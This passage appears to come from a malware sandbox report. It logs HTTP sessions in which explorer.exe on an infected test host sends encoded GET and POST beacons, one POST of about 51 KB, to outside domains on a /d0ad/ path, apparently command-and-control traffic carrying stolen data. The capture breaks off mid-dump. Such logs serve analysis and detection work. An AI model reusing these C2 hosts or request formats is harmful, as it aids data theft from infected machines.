64 36 31 46 65 49 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=1_AFw1b3p2LiSqbyNNwgM7bNpDn87XwNDtLauZUf0fKW6-FE5x4Z6CEPRZvjxL7hzVdcSIWquTRLNpKTdb(RKyNSXKVYZCrmvAFQnDKZNhq8En4MG0v31yD9Zcyrn_Ap3T24fV58dvey5kCdulHkREmVdeDVTADT8M9rjDZCo9BxAjeXvFSf~JaaK24Buef5vKTBAm46c2E_WCZEL5YGsEET~nmERD8QWRNrZzRWha56EKaFAwN2(rpCCiuEr0(jlJfMgBjjFkoW12gnrf8nvpXv0LRX9Grg6EPjyoOa7thOB2z7LpS4y2(uMCfufx23H75OwUXNsB5OE3GmSb05P0T9DBwe3CmBBYSb8OXYU2ewuiubZ5uchDLkjLnM4R3bWPj3~SU_bXLZEATjVCyQqxajj7hYEsH6c3r26QwOmQl-hJVwcYERXZOqbnQUX8vyN6VMsKf-YjqqLW64FTZC7YJhmaywhcfM1GanKCeAKn4rzkj9Vz~MSG5e2-dWfAAv9d61FeI.
Oct 26, 2022 13:15:52.571872950 CEST	390	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:15:52 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.11.20	49914	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:20.328089952 CEST	1546	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== HTTP/1.1 Host: www.creotopi.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:19:20.537517071 CEST	1547	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:19:19 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 365 Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== X-Server-Cache: true X-Proxy-Cache: MISS Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 3f 2d 5a 65 44 78 48 3d 31 62 66 44 78 68 65 58 4c 54 57 74 78 42 30 26 61 6d 70 3b 6a 58 75 3d 34 39 6f 6c 7a 42 72 45 6b 51 32 36 54 70 2f 57 48 4d 49 50 44 4a 54 76 36 6d 62 6b 38 47 63 38 48 2b 66 6e 31 4d 41 66 79 4d 4f 65 38 74 70 45 7a 69 70 6b 39 55 5a 55 53 6f 33 67 79 4b 62 31 79 45 42 4e 41 70 4c 7a 36 67 5a 51 46 62 61 6c 63 35 66 50 41 68 67 6b 5a 65 56 62 59 53 33 53 6a 67 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg==">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.11.20	49915	162.0.238.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:35.707557917 CEST	1548	OUT	POST /d0ad/ HTTP/1.1 Host: www.yumfechy.online Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.yumfechy.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yumfechy.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 71 71 4a 4b 6e 6e 72 32 4f 37 72 63 48 58 62 41 31 31 55 68 55 56 6d 67 4d 4c 77 64 58 57 64 52 5a 49 35 54 4c 36 56 36 4f 47 56 37 50 4c 6b 70 49 56 53 54 72 39 6e 50 49 35 61 47 52 59 32 32 78 75 51 6c 4b 64 46 32 6f 35 54 73 55 51 33 38 6c 41 52 30 79 66 59 6c 34 46 42 51 39 37 75 6c 71 52 37 30 51 45 72 68 76 54 6c 74 39 38 38 77 43 79 48 30 67 2d 59 54 50 38 6e 2d 32 38 78 47 75 32 44 41 78 52 45 6e 71 63 48 65 31 30 38 56 69 39 52 41 73 50 61 6e 7e 54 71 2d 63 38 62 62 38 79 5a 31 58 67 4a 62 6d 58 4e 6a 57 57 70 74 62 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=qqJKnnr2O7rcHXbA11UhUVmgMLwdXWdRZI5TL6V6OGV7PLkpIVSTr9nPI5aGRY22xuQlKdF2o5TsUQ38lAR0yfYl4FBQ97ulqR70QErhvTlt988wCyH0g-YTP8n-28xGu2DAxREnqcHe108Vi9RAsPan~Tq-c8bb8yZ1XgJbmXNjWWptbg).
Oct 26, 2022 13:19:35.980396032 CEST	1549	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:19:35 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.11.20	49916	162.0.238.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:37.893887997 CEST	1551	OUT	POST /d0ad/ HTTP/1.1 Host: www.yumfechy.online Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.yumfechy.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yumfechy.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 71 71 4a 4b 6e 6e 72 32 4f 37 72 63 56 48 4c 41 30 57 4d 68 63 56 6d 6e 53 62 77 64 63 32 64 4b 5a 49 39 54 4c 34 34 69 4e 30 68 37 50 76 67 70 4a 58 71 54 71 39 6e 50 48 5a 61 44 66 34 32 39 78 75 63 48 4b 66 52 32 6f 35 48 73 58 43 54 38 6b 77 52 31 34 5f 59 36 77 6c 42 54 72 4c 75 5f 71 52 32 64 51 45 54 68 76 69 4a 74 38 39 51 77 54 58 7a 7a 6b 65 59 76 4a 38 6e 78 39 63 78 4d 75 32 4f 6a 78 56 45 52 71 75 62 65 31 56 63 56 6a 39 52 48 33 50 61 6b 32 7a 72 51 51 34 43 4a 6c 42 68 58 58 44 45 6e 68 48 6f 76 41 30 30 52 62 73 75 6b 46 2d 67 76 6b 35 37 53 31 4c 34 36 6c 65 59 51 39 39 4a 61 52 6f 69 42 4b 59 45 34 6c 7a 31 57 59 6f 76 79 74 71 33 51 7e 47 75 4d 55 6a 7a 75 7a 2d 49 35 47 5f 61 5a 6e 6f 28 53 32 6f 6d 44 69 4a 28 36 4e 55 72 47 65 74 78 67 41 4b 79 71 70 63 77 74 55 74 73 78 6e 68 52 33 56 37 66 33 43 58 73 6a 6a 39 61 4b 59 58 4b 6d 36 6b 49 6d 31 4b 54 4e 37 65 76 4a 4a 64 74 6d 47 5f 65 4b 65 62 38 38 6e 74 36 79 32 39 33 63 44 68 65 76 4c 54 42 56 54 63 4f 30 38 67 76 42 41 44 4d 72 53 2d 47 4c 52 77 4e 58 7a 6e 38 52 4f 5f 44 61 59 6e 64 68 62 6d 34 6b 66 57 52 2d 36 70 33 35 73 37 4f 73 6d 37 37 43 62 78 30 52 67 6e 44 55 44 4d 50 32 37 37 4f 30 44 48 6e 4e 4c 50 4d 46 72 52 64 39 71 52 38 31 58 6f 67 77 28 32 59 64 61 6a 68 63 79 33 6b 4e 68 42 36 75 74 32 6b 34 31 31 42 33 63 61 36 75 6a 64 51 48 34 41 4e 54 36 4f 32 49 34 6c 55 54 77 38 53 65 51 44 55 34 79 55 43 39 67 32 4b 7a 5a 42 6d 4e 59 64 5a 67 6e 61 43 62 58 75 30 49 53 6d 4e 46 7a 37 6e 31 62 62 45 6e 46 35 72 53 55 6c 6a 48 57 48 78 69 46 6d 30 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=qqJKnnr2O7rcVHLA0WMhcVmnSbwdc2dKZI9TL44iN0h7PvgpJXqTq9nPHZaDf429xucHKfR2o5HsXCT8kwR14_Y6wlBTrLu_qR2dQEThviJt89QwTXzzkeYvJ8nx9cxMu2OjxVERqube1VcVj9RH3Pak2zrQQ4CJlBhXXDEnhHovA00RbsukF-gvk57S1L46leYQ99JaRoiBKYE4lz1WYovytq3Q~GuMUjzuz-I5G_aZno(S2omDiJ(6NUrGetxgAKyqpcwtUtsxnhR3V7f3CXsjj9aKYXKm6kIm1KTN7evJJdtmG_eKeb88nt6y293cDhevLTBVTcO08gvBADMrS-GLRwNXzn8RO_DaYndhbm4kfWR-6p35s7Osm77Cbx0RgnDUDMP277O0DHnNLPMFrRd9qR81Xogw(2Ydajhcy3kNhB6ut2k411B3ca6ujdQH4ANT6O2I4lUTw8SeQDU4yUC9g2KzZBmNYdZgnaCbXu0ISmNFz7n1bbEnF5rSUljHWHxiFm0.
Oct 26, 2022 13:19:38.171796083 CEST	1552	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:19:37 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.11.20	49917	162.0.238.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:40.081707001 CEST	1557	OUT	POST /d0ad/ HTTP/1.1 Host: www.yumfechy.online Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.yumfechy.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yumfechy.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 71 71 4a 4b 6e 6e 72 32 4f 37 72 63 56 48 4c 41 30 57 4d 68 63 56 6d 6e 53 62 77 64 63 32 64 4b 5a 49 39 54 4c 34 34 69 4e 30 35 37 50 36 30 70 4a 32 71 54 70 39 6e 50 5a 70 61 43 66 34 32 67 78 75 55 44 4b 66 64 4d 6f 37 28 73 53 42 48 38 6a 44 70 31 39 5f 59 37 31 6c 42 52 39 37 76 32 71 52 36 4a 51 41 28 75 76 54 39 74 39 39 67 77 43 51 66 30 6f 75 59 54 4a 38 6d 77 35 63 78 36 75 32 4b 56 78 51 63 52 71 74 76 65 31 6d 6b 56 6c 75 70 48 74 50 61 37 76 44 72 54 62 59 43 77 6c 43 64 70 58 44 46 61 68 44 77 76 41 32 73 52 59 76 47 6e 47 65 67 76 34 4a 37 54 6b 37 30 32 6c 65 55 49 39 35 4a 61 52 76 6d 42 4c 34 45 34 31 43 31 56 50 34 76 30 70 71 33 44 70 57 71 55 55 6a 6e 69 7a 36 45 35 42 50 4f 5a 31 4c 58 53 35 73 36 44 73 4a 28 76 44 30 71 61 4a 39 78 38 41 4b 69 4d 70 64 64 51 55 71 55 78 6b 46 46 33 52 66 4c 32 47 33 73 6c 6d 39 61 66 50 48 32 71 36 6c 35 6c 31 4b 54 6a 37 63 44 4a 4a 4d 39 6d 48 2d 65 4e 66 72 39 56 76 4e 36 6a 34 64 37 43 44 67 32 6e 4c 53 6f 51 54 66 69 30 6d 41 76 42 4c 45 67 6f 4a 65 47 51 65 51 4e 4a 33 6e 39 4f 4f 5f 50 6f 59 6d 5a 4c 62 51 4d 6b 65 69 4e 2d 77 5a 33 2d 6f 62 4f 6f 28 4c 37 45 66 78 30 52 67 6e 4f 6a 44 4d 54 32 37 70 65 30 4d 58 58 4e 49 6f 34 46 70 52 64 6b 71 52 38 47 58 6f 63 62 28 31 35 38 61 69 51 55 79 78 55 4e 67 52 47 75 68 58 6b 5f 6e 31 42 2d 59 61 36 35 75 39 4e 46 34 45 56 4c 36 4f 6d 2d 35 58 41 54 78 34 32 65 55 44 55 37 69 30 43 32 68 32 4b 66 54 68 72 4d 59 64 45 56 6e 61 32 4c 58 75 63 49 44 78 74 64 68 66 54 49 59 4a 6b 4e 62 70 28 43 62 48 54 34 4d 45 74 6b 65 6d 66 30 63 63 72 67 44 4e 4b 43 6a 45 35 54 6b 49 6a 44 35 6d 52 58 28 47 72 67 34 50 4c 68 33 56 4d 6e 38 5f 75 37 6e 79 55 6c 39 68 38 6e 64 62 6f 45 64 61 6f 74 68 6f 47 77 49 5f 31 75 33 37 64 44 35 59 70 66 79 6e 4e 59 73 72 31 74 68 79 55 36 64 4f 42 4a 31 32 4c 56 4a 42 67 43 6d 36 30 33 49 4f 67 45 71 70 56 44 69 62 54 35 6b 59 38 65 37 4e 5a 4f 65 53 33 5a 30 6b 28 50 4e 52 39 51 69 69 52 32 39 54 78 63 50 69 70 72 4d 4c 68 78 4b 4b 53 56 63 65 75 6a 38 72 31 78 79 4d 67 70 54 6a 72 73 47 50 56 68 36 74 39 77 74 38 32 43 33 56 45 58 44 54 46 53 5a 44 6e 75 6f 56 77 6a 52 61 62 6d 4f 70 6e 78 77 47 7a 6c 6b 31 64 68 4c 4d 6d 62 31 6a 30 53 72 58 33 6c 6c 46 75 53 79 74 44 51 39 51 38 66 77 4f 50 4c 4b 4b 47 31 34 77 6f 78 50 31 63 37 41 5a 57 38 61 35 45 70 46 6a 47 45 4f 71 43 4f 47 73 62 33 66 61 6c 33 31 38 75 7a 61 35 79 4b 28 35 7e 4b 65 6e 54 69 5a 48 71 6e 79 42 51 70 65 5a 50 50 74 5a 72 6a 53 59 36 76 6b 63 4e 73 4b 30 55 75 39 33 4b 56 33 5f 69 4d 36 35 6f 6a 42 53 46 58 46 35 45 31 49 4c 78 74 41 38 31 41 6f 4e 68 6a 6f 49 4d 4c 52 51 4c 49 61 4f 55 68 66 42 6f 7a 59 6e 28 44 42 37 38 77 33 72 69 6e 35 5a 6c 7a 70 42 37 44 47 4c 78 7a 4d 45 4e 7a 4f 55 32 5f 7e 6d 63 49 31 66 4c 38 31 49 56 2d 4b 66 55 63 43 75 72 4d 73 31 32 6c 58 46 53 52 39 4f 71 69 28 6e 63 37 56 4b 34 74 74 2d 42 53 61 76 57 46 36 68 4b 36 36 56 32 64 6d 63 79 68 6c 48 34 64 66 54 46 4c 6a 34 51 59 73 7a 6e 4d 75 33 67 37 69 4e 75 4f 76 42 65 73 70 64 74 47 7e 4f 63 6d 57 79 63 51 49 41 68 48 34 79 65 71 71 6e 42 7a 4f 4f 39 33 49 64 34 44 7e 58 78 4a 47 6a 7a 57 41 59 63 30 4c 63 61 49 5a 48 44 68 54 6f 69 39 56 6b 46 4a 48 74 38 47 69 4e 30 4d 63 65 30 44 59 4a 43 47 6f 66 45 6b 31 55 54 5f 30 71 34 2d 4e 73 6f 64 52 48 43 58 64 79 49 77 54 71 51 61 